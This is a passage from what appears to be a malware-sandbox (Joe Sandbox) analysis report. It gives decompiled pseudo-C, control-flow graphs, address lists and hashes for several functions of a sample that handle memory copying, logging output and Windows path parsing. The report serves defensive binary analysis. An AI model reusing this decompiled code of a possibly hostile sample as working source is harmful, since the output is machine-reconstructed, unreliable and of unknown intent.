                                                                                                                    • API String ID: 2750596395-0
                                                                                                                    • Opcode ID: 01bbad3142965a35b0afdd29c5bbba5c42c79e78ce5c8cee56c3744d3aa73474
                                                                                                                    • Instruction ID: 958eb0288061925e434601e3910096bcec29f5eaa0fdd33d2e1983abb9c35dc3
                                                                                                                    • Opcode Fuzzy Hash: 01bbad3142965a35b0afdd29c5bbba5c42c79e78ce5c8cee56c3744d3aa73474
                                                                                                                    • Instruction Fuzzy Hash: CF919831D01249EFCF14DFA8D884AEDBBF1EF59314F9481E9E415AB291DB309A85CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B5B0FC Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1627 b5b0fc-b5b118 __EH_prolog call b1feb1 1629 b5b11d-b5b11f 1627->1629 1630 b5b125-b5b12e call b5b32e 1629->1630 1631 b5b2b4-b5b2c2 1629->1631 1634 b5b137-b5b13c 1630->1634 1635 b5b130-b5b132 1630->1635 1636 b5b14d-b5b164 1634->1636 1637 b5b13e-b5b143 1634->1637 1635->1631 1640 b5b166-b5b176 _CxxThrowException 1636->1640 1641 b5b17b-b5b192 memcpy 1636->1641 1637->1636 1638 b5b145-b5b148 1637->1638 1638->1631 1640->1641 1642 b5b196-b5b1a1 1641->1642 1643 b5b1a6-b5b1a8 1642->1643 1644 b5b1a3 1642->1644 1645 b5b1cb-b5b1e3 1643->1645 1646 b5b1aa-b5b1b9 1643->1646 1644->1643 1654 b5b1e5-b5b1ea 1645->1654 1655 b5b25b-b5b25d 1645->1655 1647 b5b1c3-b5b1c5 1646->1647 1648 b5b1bb 1646->1648 1647->1645 1651 b5b25f-b5b262 1647->1651 1649 b5b1c1 1648->1649 1650 b5b1bd-b5b1bf 1648->1650 1649->1647 1650->1647 1650->1649 1653 b5b2a1-b5b2b2 1651->1653 1653->1631 1654->1651 1656 b5b1ec-b5b1ff call b5b2c5 1654->1656 1655->1653 1660 b5b201-b5b219 call b7e140 1656->1660 1661 b5b23a-b5b256 memmove 1656->1661 1664 b5b264-b5b29f memcpy 1660->1664 1665 b5b21b-b5b235 call b5b2c5 1660->1665 1661->1642 1664->1653 1665->1660 1669 b5b237 1665->1669 1669->1661
                                                                                                                    C-Code - Quality: 74%
                                                                                                                    			E00B5B0FC(void* __ecx, void* __eflags) {
				signed int _t60;
				intOrPtr* _t67;
				signed int _t68;
				signed int _t70;
				signed int _t72;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				signed int _t92;
				void* _t94;
				signed int _t105;
				intOrPtr* _t107;
				void* _t116;
				void* _t117;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t128;
				signed int _t130;
				void* _t132;
				void* _t134;
				void* _t135;
				void* _t137;

				L00B7F140(0xb87810, _t132);
				_t135 = _t134 - 0x14;
				_t128 = __ecx;
				_t120 = __ecx + 0x58;
				_t60 = E00B1FEB1(__eflags, 0x20); // executed
				if(_t60 == 0) {
					if(L00B5B32E(_t120) == 0) {
						_t92 =  *(_t132 + 0xc);
						__eflags = _t92;
						if(_t92 == 0) {
							L6:
							_t122 =  *0xb8f994();
							__eflags = _t122;
							 *(_t132 - 0x14) = _t122;
							if(_t122 == 0) {
								_push(0xb8ffc8);
								_push(_t132 + 8);
								 *((intOrPtr*)(_t132 + 8)) = 1;
								L00B7F160();
							}
							 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
							memcpy(_t122, _t128 + 0x58, 0x20);
							 *(_t132 - 0x20) =  *(_t132 - 0x20) & 0x00000000;
							_t137 = _t135 + 0xc;
							_t13 = _t132 - 0x1c;
							 *_t13 =  *(_t132 - 0x1c) & 0x00000000;
							__eflags =  *_t13;
							while(1) {
								_t112 = 0x7fe0;
								__eflags =  *(_t132 - 0x20) |  *(_t132 - 0x1c);
								if(( *(_t132 - 0x20) |  *(_t132 - 0x1c)) != 0) {
									_t112 = 0x8000;
									__eflags = 0x7fe0;
								}
								__eflags = _t92;
								if(_t92 == 0) {
									goto L17;
								}
								_t105 =  *_t92 -  *(_t132 - 0x20);
								asm("sbb eax, [ebp-0x1c]");
								__eflags = 0 -  *(_t92 + 4);
								if(__eflags >= 0) {
									if(__eflags > 0) {
										L15:
										_t112 = _t105;
									} else {
										__eflags = _t112 - _t105;
										if(_t112 > _t105) {
											goto L15;
										}
									}
								}
								__eflags = _t112;
								if(_t112 == 0) {
									L25:
									_t130 = 1;
								} else {
									goto L17;
								}
								L27:
								_t55 = _t132 - 4;
								 *_t55 =  *(_t132 - 4) | 0xffffffff;
								__eflags =  *_t55;
								 *0xb8f998();
								_t60 = _t130;
								goto L28;
								L17:
								_t67 =  *((intOrPtr*)(_t132 + 8));
								 *(_t132 - 0x10) =  *(_t132 - 0x10) & 0x00000000;
								_t23 = _t122 + 0x20; // 0x20
								_t68 =  *((intOrPtr*)( *_t67 + 0xc))(_t67, _t23, _t112, _t132 - 0x10);
								__eflags = _t68;
								if(_t68 != 0) {
									_t130 = _t68;
								} else {
									_t70 =  *(_t132 - 0x10);
									__eflags = _t70;
									if(_t70 == 0) {
										goto L25;
									} else {
										_t26 = _t122 + 1; // 0x1
										 *((intOrPtr*)(_t132 - 0x18)) = _t26 + _t70;
										_t94 = L00B5B2C5(_t26, _t26 + _t70);
										__eflags = _t94 -  *((intOrPtr*)(_t132 - 0x18));
										if(_t94 >=  *((intOrPtr*)(_t132 - 0x18))) {
											L23:
											_t72 =  *(_t132 - 0x10);
											 *(_t132 - 0x20) =  *(_t132 - 0x20) + _t72;
											asm("adc dword [ebp-0x1c], 0x0");
											memmove(_t122, _t122 + _t72, 0x20);
											_t92 =  *(_t132 + 0xc);
											_t137 = _t137 + 0xc;
											continue;
										} else {
											while(1) {
												_t124 = _t94 -  *(_t132 - 0x14);
												_t116 = 0x14;
												_t75 = E00B7E140(_t94 + 0xc, _t116);
												_t75 -  *((intOrPtr*)(_t94 + 8)) = _t75 & 0xffffff00 | _t75 ==  *((intOrPtr*)(_t94 + 8));
												if((_t75 & 0xffffff00 | _t75 ==  *((intOrPtr*)(_t94 + 8))) != 0) {
													break;
												}
												 *((intOrPtr*)(_t132 - 0x18)) =  *(_t132 - 0x14) + 1 +  *(_t132 - 0x10);
												_t94 = L00B5B2C5( *(_t132 - 0x14) + 1 + _t124,  *(_t132 - 0x14) + 1 +  *(_t132 - 0x10));
												__eflags = _t94 -  *((intOrPtr*)(_t132 - 0x18));
												if(_t94 <  *((intOrPtr*)(_t132 - 0x18))) {
													continue;
												} else {
													_t122 =  *(_t132 - 0x14);
													goto L23;
												}
												goto L27;
											}
											memcpy(_t128 + 0x58, _t94, 0x20);
											_t107 =  *((intOrPtr*)(_t132 + 8));
											asm("adc eax, [ebp-0x1c]");
											 *((intOrPtr*)(_t128 + 0x40)) =  *((intOrPtr*)(_t128 + 0x40)) + _t124 +  *(_t132 - 0x20);
											_t117 = 0;
											asm("adc [esi+0x44], eax");
											_t81 =  *((intOrPtr*)(_t128 + 0x40)) + 0x20;
											__eflags = _t81;
											asm("adc esi, edx");
											_t82 =  *((intOrPtr*)( *_t107 + 0x10))(_t107, _t81,  *((intOrPtr*)(_t128 + 0x44)), _t117, _t117);
											_t122 =  *(_t132 - 0x14);
											_t130 = _t82;
										}
									}
								}
								goto L27;
							}
						} else {
							__eflags =  *_t92 |  *(_t92 + 4);
							if(( *_t92 |  *(_t92 + 4)) != 0) {
								goto L6;
							} else {
								_t60 = 1;
							}
						}
					} else {
						_t60 = 0;
					}
				}
				L28:
				 *[fs:0x0] =  *((intOrPtr*)(_t132 - 0xc));
				return _t60;
			}


























                                                                                                                    0x00b5b101
                                                                                                                    0x00b5b106
                                                                                                                    0x00b5b10b
                                                                                                                    0x00b5b113
                                                                                                                    0x00b5b118
                                                                                                                    0x00b5b11f
                                                                                                                    0x00b5b12e
                                                                                                                    0x00b5b137
                                                                                                                    0x00b5b13a
                                                                                                                    0x00b5b13c
                                                                                                                    0x00b5b14d
                                                                                                                    0x00b5b15d
                                                                                                                    0x00b5b15f
                                                                                                                    0x00b5b161
                                                                                                                    0x00b5b164
                                                                                                                    0x00b5b169
                                                                                                                    0x00b5b16e
                                                                                                                    0x00b5b16f
                                                                                                                    0x00b5b176
                                                                                                                    0x00b5b176
                                                                                                                    0x00b5b17b
                                                                                                                    0x00b5b186
                                                                                                                    0x00b5b18b
                                                                                                                    0x00b5b18f
                                                                                                                    0x00b5b192
                                                                                                                    0x00b5b192
                                                                                                                    0x00b5b192
                                                                                                                    0x00b5b196
                                                                                                                    0x00b5b199
                                                                                                                    0x00b5b19e
                                                                                                                    0x00b5b1a1
                                                                                                                    0x00b5b1a3
                                                                                                                    0x00b5b1a3
                                                                                                                    0x00b5b1a3
                                                                                                                    0x00b5b1a6
                                                                                                                    0x00b5b1a8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5b1af
                                                                                                                    0x00b5b1b2
                                                                                                                    0x00b5b1b7
                                                                                                                    0x00b5b1b9
                                                                                                                    0x00b5b1bb
                                                                                                                    0x00b5b1c1
                                                                                                                    0x00b5b1c1
                                                                                                                    0x00b5b1bd
                                                                                                                    0x00b5b1bd
                                                                                                                    0x00b5b1bf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5b1bf
                                                                                                                    0x00b5b1bb
                                                                                                                    0x00b5b1c3
                                                                                                                    0x00b5b1c5
                                                                                                                    0x00b5b25f
                                                                                                                    0x00b5b261
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5b2a1
                                                                                                                    0x00b5b2a1
                                                                                                                    0x00b5b2a1
                                                                                                                    0x00b5b2a1
                                                                                                                    0x00b5b2ac
                                                                                                                    0x00b5b2b2
                                                                                                                    0x00000000
                                                                                                                    0x00b5b1cb
                                                                                                                    0x00b5b1cb
                                                                                                                    0x00b5b1ce
                                                                                                                    0x00b5b1d9
                                                                                                                    0x00b5b1de
                                                                                                                    0x00b5b1e1
                                                                                                                    0x00b5b1e3
                                                                                                                    0x00b5b25b
                                                                                                                    0x00b5b1e5
                                                                                                                    0x00b5b1e5
                                                                                                                    0x00b5b1e8
                                                                                                                    0x00b5b1ea
                                                                                                                    0x00000000
                                                                                                                    0x00b5b1ec
                                                                                                                    0x00b5b1ec
                                                                                                                    0x00b5b1f2
                                                                                                                    0x00b5b1fa
                                                                                                                    0x00b5b1fc
                                                                                                                    0x00b5b1ff
                                                                                                                    0x00b5b23a
                                                                                                                    0x00b5b23a
                                                                                                                    0x00b5b23f
                                                                                                                    0x00b5b242
                                                                                                                    0x00b5b24a
                                                                                                                    0x00b5b250
                                                                                                                    0x00b5b253
                                                                                                                    0x00000000
                                                                                                                    0x00b5b201
                                                                                                                    0x00b5b201
                                                                                                                    0x00b5b205
                                                                                                                    0x00b5b208
                                                                                                                    0x00b5b20c
                                                                                                                    0x00b5b217
                                                                                                                    0x00b5b219
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5b228
                                                                                                                    0x00b5b230
                                                                                                                    0x00b5b232
                                                                                                                    0x00b5b235
                                                                                                                    0x00000000
                                                                                                                    0x00b5b237
                                                                                                                    0x00b5b237
                                                                                                                    0x00000000
                                                                                                                    0x00b5b237
                                                                                                                    0x00000000
                                                                                                                    0x00b5b235
                                                                                                                    0x00b5b26b
                                                                                                                    0x00b5b278
                                                                                                                    0x00b5b27d
                                                                                                                    0x00b5b280
                                                                                                                    0x00b5b283
                                                                                                                    0x00b5b286
                                                                                                                    0x00b5b291
                                                                                                                    0x00b5b291
                                                                                                                    0x00b5b294
                                                                                                                    0x00b5b299
                                                                                                                    0x00b5b29c
                                                                                                                    0x00b5b29f
                                                                                                                    0x00b5b29f
                                                                                                                    0x00b5b1ff
                                                                                                                    0x00b5b1ea
                                                                                                                    0x00000000
                                                                                                                    0x00b5b1e3
                                                                                                                    0x00b5b13e
                                                                                                                    0x00b5b140
                                                                                                                    0x00b5b143
                                                                                                                    0x00000000
                                                                                                                    0x00b5b145
                                                                                                                    0x00b5b147
                                                                                                                    0x00b5b147
                                                                                                                    0x00b5b143
                                                                                                                    0x00b5b130
                                                                                                                    0x00b5b130
                                                                                                                    0x00b5b130
                                                                                                                    0x00b5b12e
                                                                                                                    0x00b5b2b4
                                                                                                                    0x00b5b2ba
                                                                                                                    0x00b5b2c2

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: af080adcce941baa6b51efa71d827ec64f103fc0145a217d05fd1289e0f7c27a
                                                                                                                    • Instruction ID: bd47169d809beb566680d8420367225ee5714b0574fde291e00d3628f74dfa41
                                                                                                                    • Opcode Fuzzy Hash: af080adcce941baa6b51efa71d827ec64f103fc0145a217d05fd1289e0f7c27a
                                                                                                                    • Instruction Fuzzy Hash: 86519076A006069FDB10DFA4C885FBEB7F5FF88315F1484A8E911AB241DB75E909CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B44941 Relevance: 7.7, APIs: 5, Instructions: 151COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00B44941(intOrPtr _a4, signed int _a7, intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr* _a20) {
				char* _t53;
				intOrPtr _t54;
				void* _t55;
				void* _t80;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				signed char* _t85;
				signed char** _t90;
				char** _t111;
				intOrPtr* _t112;
				intOrPtr _t114;

				EnterCriticalSection(0xb9a878);
				_t114 = _a4;
				L00B12F14(_t114 + 0x104, _a8);
				_t85 = 0;
				_push(1);
				_t53 = _a16;
				_pop(0);
				if(_t53 == 0) {
					_t54 =  *0xb8c1e8; // 0xb89630
					L10:
					_a16 = _t54;
					L11:
					if( *((intOrPtr*)(_t114 + 0x168)) < 0 ||  *(_t114 + 0xc8) == _t85) {
						_a7 = _a7 & 0x00000000;
					} else {
						_a7 = 1;
						E00B44B28(_t114);
						_t111 = _t114 + 0xec;
						E00B1275A(_t111, _a16);
						if(_a8 != _t85) {
							E00B12869();
						}
						fputs( *_t111,  *( *(_t114 + 0xc8)));
						_t112 = _t114 + 0xf8;
						 *(_t112 + 4) = 0;
						 *((short*)( *_t112)) = 0;
						if(_a8 != 0) {
							L00B12F14(_t112, _a8);
							E00B120E3( *(_t114 + 0xc8), _t112);
							if(_a12 != 0 &&  *((intOrPtr*)(_t114 + 0xfc)) != 0 &&  *((short*)( *_t112 +  *(_t112 + 4) * 2 - 2)) != 0x5c) {
								L00B11089(_t112, 0x5c);
							}
						}
						E00B12059( *(_t114 + 0xc8), _t112, _t114 + 0xec);
						if(_a20 != 0) {
							fputs(" <",  *( *(_t114 + 0xc8)));
							fputs(">",  *(E00B1224A( *(_t114 + 0xc8),  *_a20,  *((intOrPtr*)(_a20 + 4)))));
						}
						E00B11FE9( *(_t114 + 0xc8));
						if( *((char*)(_t114 + 0x160)) != 0) {
							L00B11FDA( *(_t114 + 0xc8));
						}
						_t85 = 0;
					}
					if( *((intOrPtr*)(_t114 + 0xbc)) != _t85) {
						if( *((intOrPtr*)(_t114 + 0x164)) >= 1) {
							_t110 = _t114 + 0x3c;
							_t90 = _t114 + 0x30;
							 *(_t114 + 0x40) = _t85;
							 *( *(_t114 + 0x3c)) = _t85;
							_t90[1] = _t85;
							 *( *_t90) =  *( *_t90) & 0x00000000;
							if( *((intOrPtr*)(_t114 + 0x164)) > 1 || _a7 == 0) {
								E00B1275A(_t90, _a16);
								if(_a8 != _t85) {
									L00B12F14(_t110, _a8);
								}
							}
						}
						E00B4B752(_t114 + 0x18); // executed
					}
					_t55 = L00B4574E();
					LeaveCriticalSection(0xb9a878);
					return _t55;
				}
				_t80 = _t53 - 1;
				if(_t80 == 0) {
					_t54 =  *0xb8c1e4; // 0xb8c4e8
					goto L10;
				}
				_t81 = _t80 - 1;
				if(_t81 == 0) {
					_t82 =  *0xb8c1ec; // 0xb8965c
					_a16 = _t82;
					L5:
					_push(2);
					_pop(0);
					goto L11;
				}
				if(_t81 == 1) {
					_t84 =  *0xb8c1f0; // 0xb8c4e4
					_a16 = _t84;
					goto L11;
				} else {
					_a16 = "???";
					goto L5;
				}
			}















                                                                                                                    0x00b4494c
                                                                                                                    0x00b44952
                                                                                                                    0x00b4495e
                                                                                                                    0x00b44966
                                                                                                                    0x00b44968
                                                                                                                    0x00b4496a
                                                                                                                    0x00b4496c
                                                                                                                    0x00b4496d
                                                                                                                    0x00b449a1
                                                                                                                    0x00b449a6
                                                                                                                    0x00b449a6
                                                                                                                    0x00b449a9
                                                                                                                    0x00b449af
                                                                                                                    0x00b44b22
                                                                                                                    0x00b449c1
                                                                                                                    0x00b449c3
                                                                                                                    0x00b449c7
                                                                                                                    0x00b449cf
                                                                                                                    0x00b449d7
                                                                                                                    0x00b449df
                                                                                                                    0x00b449e3
                                                                                                                    0x00b449e3
                                                                                                                    0x00b449f8
                                                                                                                    0x00b449fb
                                                                                                                    0x00b44a09
                                                                                                                    0x00b44a0c
                                                                                                                    0x00b44a0f
                                                                                                                    0x00b44a16
                                                                                                                    0x00b44a22
                                                                                                                    0x00b44a2b
                                                                                                                    0x00b44a47
                                                                                                                    0x00b44a47
                                                                                                                    0x00b44a2b
                                                                                                                    0x00b44a5a
                                                                                                                    0x00b44a63
                                                                                                                    0x00b44a72
                                                                                                                    0x00b44a8c
                                                                                                                    0x00b44a8f
                                                                                                                    0x00b44a96
                                                                                                                    0x00b44aa2
                                                                                                                    0x00b44aaa
                                                                                                                    0x00b44aaa
                                                                                                                    0x00b44aaf
                                                                                                                    0x00b44aaf
                                                                                                                    0x00b44ab7
                                                                                                                    0x00b44ac0
                                                                                                                    0x00b44ac5
                                                                                                                    0x00b44ac8
                                                                                                                    0x00b44acb
                                                                                                                    0x00b44ace
                                                                                                                    0x00b44ad3
                                                                                                                    0x00b44ad6
                                                                                                                    0x00b44ae0
                                                                                                                    0x00b44aeb
                                                                                                                    0x00b44af3
                                                                                                                    0x00b44afa
                                                                                                                    0x00b44afa
                                                                                                                    0x00b44af3
                                                                                                                    0x00b44ae0
                                                                                                                    0x00b44b02
                                                                                                                    0x00b44b02
                                                                                                                    0x00b44b07
                                                                                                                    0x00b44b13
                                                                                                                    0x00b44b1f
                                                                                                                    0x00b44b1f
                                                                                                                    0x00b4496f
                                                                                                                    0x00b44970
                                                                                                                    0x00b4499a
                                                                                                                    0x00000000
                                                                                                                    0x00b4499a
                                                                                                                    0x00b44972
                                                                                                                    0x00b44973
                                                                                                                    0x00b44990
                                                                                                                    0x00b44995
                                                                                                                    0x00b4497f
                                                                                                                    0x00b4497f
                                                                                                                    0x00b44981
                                                                                                                    0x00000000
                                                                                                                    0x00b44981
                                                                                                                    0x00b44976
                                                                                                                    0x00b44984
                                                                                                                    0x00b4498b
                                                                                                                    0x00000000
                                                                                                                    0x00b44978
                                                                                                                    0x00b44978
                                                                                                                    0x00000000
                                                                                                                    0x00b44978

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$CriticalSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1081906680-0
                                                                                                                    • Opcode ID: afd017cd8ccb65e04508d05699ceee685ff88da1e182c2ae3450743b8d655906
                                                                                                                    • Instruction ID: febc580138e5d31e6a803a67965986858f788e05107a3f8c8a458648e9cf573d
                                                                                                                    • Opcode Fuzzy Hash: afd017cd8ccb65e04508d05699ceee685ff88da1e182c2ae3450743b8d655906
                                                                                                                    • Instruction Fuzzy Hash: 0D51A130100245DFDF24EF64D885BEABBE1FF44310F4084AEE45A572A1CB71AEA5EB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B169AB Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 398COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00B169AB(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t168;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				intOrPtr _t174;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t184;
				signed char _t185;
				signed int _t192;
				intOrPtr _t200;
				intOrPtr _t202;
				signed int _t206;
				signed int _t208;
				intOrPtr _t209;
				signed int _t210;
				signed int _t224;
				signed int _t228;
				signed int _t235;
				intOrPtr _t236;
				signed int _t239;
				signed int _t240;
				signed int _t247;
				void* _t253;
				signed int _t254;
				signed int _t256;
				void* _t258;
				intOrPtr* _t259;
				intOrPtr* _t260;
				intOrPtr* _t266;
				void* _t281;
				signed int _t309;
				intOrPtr* _t330;
				long _t332;
				intOrPtr* _t334;
				void* _t336;

				L00B7F140(0xb82f20, _t336);
				_t330 =  *((intOrPtr*)(_t336 + 8));
				_t334 = __ecx;
				_t168 =  *_t330;
				if(_t168 == 0x5c || _t168 == 0x2f) {
					_t169 =  *((intOrPtr*)(_t330 + 2));
					if(_t169 == 0x5c || _t169 == 0x2f) {
						_t253 = _t330 + 4;
						if( *((short*)(_t330 + 4)) != 0x2e ||  *((short*)(_t330 + 6)) != 0) {
							goto L7;
						} else {
							E00B16529(_t334);
							L00B12F14(_t334 + 0x28, _t253);
							 *(_t334 + 0x20) = 0x10;
							goto L89;
						}
					} else {
						goto L7;
					}
				} else {
					L7:
					__eflags = E00B18383(_t330);
					if(__eflags == 0) {
						_t254 = E00B185E5(_t330, __eflags);
						__eflags = _t254;
						if(_t254 < 0) {
							L46:
							 *(_t336 - 0x10) =  *(_t336 - 0x10) | 0xffffffff;
							 *(_t336 - 4) = 6;
							_t255 = 0;
							_t172 = E00B18519(_t330);
							__eflags = _t172;
							if(_t172 != 0) {
								_t255 = 4;
							}
							 *((intOrPtr*)(_t336 + 8)) = _t330 + _t255 * 2;
							_t173 = E00B18301(_t330 + _t255 * 2);
							__eflags = _t173;
							if(_t173 == 0) {
								L56:
								_t174 =  *_t330;
								__eflags = _t174 - 0x5c;
								if(_t174 == 0x5c) {
									L58:
									__eflags =  *((short*)(_t330 + 2));
									_t266 = _t330;
									if( *((short*)(_t330 + 2)) != 0) {
										_t175 = E00B184A1(_t266);
										__eflags = _t175;
										if(__eflags <= 0) {
											goto L75;
										}
										__eflags =  *(_t330 + _t175 * 2);
										_t255 = _t330 + _t175 * 2;
										 *(_t336 - 0x14) = _t330 + _t175 * 2;
										if(__eflags == 0) {
											goto L75;
										}
										__eflags = E00B18297(_t255);
										if(__eflags >= 0) {
											goto L75;
										}
										_t180 = E00B16E9A(_t334, __eflags, _t330);
										__eflags = _t180;
										if(_t180 == 0) {
											_t136 = _t336 - 0x44; // -68
											E00B12DD3(_t136, _t330);
											_t137 = _t336 - 0x44; // -68
											 *(_t336 - 4) = 7;
											L00B11089(_t137, 0x5c);
											_t139 = _t336 - 0x44; // -68
											L00B11089(_t139, 0x2a);
											 *(_t336 + 0xb) =  *(_t336 + 0xb) & 0x00000000;
											_push(_t334);
											_push( *((intOrPtr*)(_t336 - 0x44)));
											_t143 = _t336 - 0x10; // -16
											_t184 = E00B165A1(_t255, _t143, _t330, __eflags);
											__eflags = _t184;
											if(_t184 == 0) {
												L71:
												_t185 = E00B1692E(_t330);
												__eflags =  *(_t336 + 0xb);
												_t255 = _t185;
												if( *(_t336 + 0xb) != 0) {
													L83:
													E00B16529(_t334);
													__eflags = _t255 - 0xffffffff;
													if(_t255 == 0xffffffff) {
														 *(_t334 + 0x20) = 0x10;
													} else {
														 *(_t334 + 0x20) = _t255;
													}
													_push( *(_t336 - 0x14));
													_t281 = _t334 + 0x28;
													L87:
													E00B11E89(L00B12F14(_t281),  *((intOrPtr*)(_t336 - 0x44)));
													L88:
													_t165 = _t336 - 0x10; // -16
													E00B16581(_t165);
													L89:
													_t178 = 1;
													goto L82;
												}
												__eflags = _t255 - 0xffffffff;
												if(__eflags == 0) {
													L74:
													 *(_t336 - 4) = 6;
													E00B11E89(_t185,  *((intOrPtr*)(_t336 - 0x44)));
													goto L75;
												}
												__eflags = _t255 & 0x00000010;
												if(__eflags != 0) {
													goto L83;
												}
												goto L74;
											}
											_t258 = _t334 + 0x28;
											_t192 = wcscmp( *(_t334 + 0x28), 0xb89394);
											__eflags = _t192;
											if(_t192 != 0) {
												 *(_t336 + 0xb) = 1;
												goto L71;
											}
											_push( *(_t336 - 0x14));
											_t281 = _t258;
											goto L87;
										}
										L00B12F14(_t334 + 0x28, _t255);
										goto L88;
									}
									_t255 = E00B1692E(_t266);
									__eflags = _t255 - 0xffffffff;
									if(__eflags == 0) {
										goto L75;
									}
									__eflags = _t255 & 0x00000010;
									if(__eflags == 0) {
										goto L75;
									}
									E00B16529(_t334);
									 *(_t334 + 0x2c) =  *(_t334 + 0x2c) & 0x00000000;
									 *( *(_t334 + 0x28)) =  *( *(_t334 + 0x28)) & 0x00000000;
									 *(_t334 + 0x20) = _t255;
									goto L55;
								}
								__eflags = _t174 - 0x2f;
								if(__eflags != 0) {
									goto L75;
								}
								goto L58;
							} else {
								__eflags =  *((short*)(_t330 + 6 + _t255 * 2));
								if( *((short*)(_t330 + 6 + _t255 * 2)) != 0) {
									goto L56;
								}
								_t255 = E00B1692E(_t330);
								__eflags = _t255 - 0xffffffff;
								if(__eflags == 0) {
									L75:
									_push(_t334);
									_push(_t330);
									_t153 = _t336 - 0x10; // -16, executed
									_t176 = E00B165A1(_t255, _t153, _t330, __eflags); // executed
									__eflags =  *((char*)(_t336 + 0xc));
									if( *((char*)(_t336 + 0xc)) != 0) {
										__eflags = _t176;
										if(_t176 != 0) {
											__eflags =  *(_t334 + 0x20) >> 0x0000000a & 0x00000001;
											if(__eflags != 0) {
												_t176 = E00B16E9A(_t334, __eflags, _t330);
											}
										}
									}
									_t256 = _t176;
									L80:
									_t158 = _t336 - 0x10; // -16
									E00B16581(_t158);
									L81:
									_t178 = _t256;
									L82:
									 *[fs:0x0] =  *((intOrPtr*)(_t336 - 0xc));
									return _t178;
								}
								__eflags = _t255 & 0x00000010;
								if(__eflags == 0) {
									goto L75;
								}
								E00B16529(_t334);
								 *(_t334 + 0x20) = _t255;
								_t259 = _t334 + 0x28;
								L00B12F14(_t259,  *((intOrPtr*)(_t336 + 8)));
								_t200 = 2;
								__eflags =  *((intOrPtr*)(_t259 + 4)) - _t200;
								if(__eflags > 0) {
									 *((intOrPtr*)(_t259 + 4)) = _t200;
									_t202 =  *_t259;
									_t121 = _t202 + 4;
									 *_t121 =  *(_t202 + 4) & 0x00000000;
									__eflags =  *_t121;
								}
								E00B16E9A(_t334, __eflags, _t330);
								L55:
								_t256 = 1;
								goto L80;
							}
						}
						__eflags =  *((short*)(_t330 + 2 + _t254 * 2));
						if( *((short*)(_t330 + 2 + _t254 * 2)) == 0) {
							goto L46;
						}
						_t41 = _t336 - 0x2c; // -44
						E00B12DD3(_t41, _t330 + _t254 * 2);
						_t42 = _t336 - 0x38; // -56
						 *(_t336 - 4) = 1;
						E00B12DD3(_t42, _t330);
						__eflags = _t254 -  *(_t336 - 0x34);
						 *(_t336 - 4) = 2;
						if(_t254 <  *(_t336 - 0x34)) {
							_t236 =  *((intOrPtr*)(_t336 - 0x38));
							 *(_t336 - 0x34) = _t254;
							_t48 = _t236 + _t254 * 2;
							 *_t48 =  *(_t236 + _t254 * 2) & 0x00000000;
							__eflags =  *_t48;
						}
						_t206 =  *(_t336 - 0x28);
						__eflags = _t206 - 6;
						if(_t206 <= 6) {
							L24:
							_t57 = _t336 - 0x2c; // -44
							L00B131AD(_t57, ":$DATA");
							goto L25;
						} else {
							_t235 = E00B12450( *((intOrPtr*)(_t336 - 0x2c)) + _t206 * 2 - 0xc, ":$DATA");
							__eflags = _t235;
							if(_t235 != 0) {
								L25:
								_t208 = E00B184FE( *((intOrPtr*)(_t336 - 0x38)));
								__eflags = _t208;
